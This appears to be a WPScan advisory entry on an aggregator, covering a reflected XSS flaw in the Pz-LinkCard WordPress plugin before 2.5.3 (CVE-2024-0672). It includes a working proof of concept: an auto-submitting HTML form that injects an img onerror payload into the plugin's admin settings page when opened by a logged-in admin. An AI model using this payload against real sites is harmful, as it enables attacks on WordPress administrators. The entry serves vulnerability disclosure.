Lucene search
Erwan LR (WPScan)WPEX-ID:ECEB6585-5969-4AA6-9908-B6BFB578190AHistoryMar 07, 2024 - 12:00 a.m.
Pz-LinkCard < 2.5.3 - Reflected XSS
2024-03-0700:00:00
Erwan LR (WPScan)
42
pz-linkcard
reflected xss
admin page auto-submit
security exploit
web application vulnerability
Description The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in admin open a page containing the code below
<html>
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=pz-linkcard-settings" method="POST">
<input type="hidden" name="pz-lkc-tab-now" value='"><img src onerror=alert(/XSS/)>' />
<input type="submit" value="Hack me" />
</form>
</body>
</html>Related
vulnrichment
vulnrichment
CVE-2024-0672 Pz-LinkCard <= 2.5.1 - Reflected XSS
2024-03-28 05:00:01
cve
cve
CVE-2024-0672
2024-03-28 05:15:49
cvelist
cvelist
CVE-2024-0672 Pz-LinkCard <= 2.5.1 - Reflected XSS
2024-03-28 05:00:01
nvd
nvd
CVE-2024-0672
2024-03-28 05:15:49
wpvulndb
wpvulndb
Pz-LinkCard < 2.5.3 - Reflected XSS
2024-03-07 00:00:00
AI Score
6
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPEX-ID:ECEB6585-5969-4AA6-9908-B6BFB578190A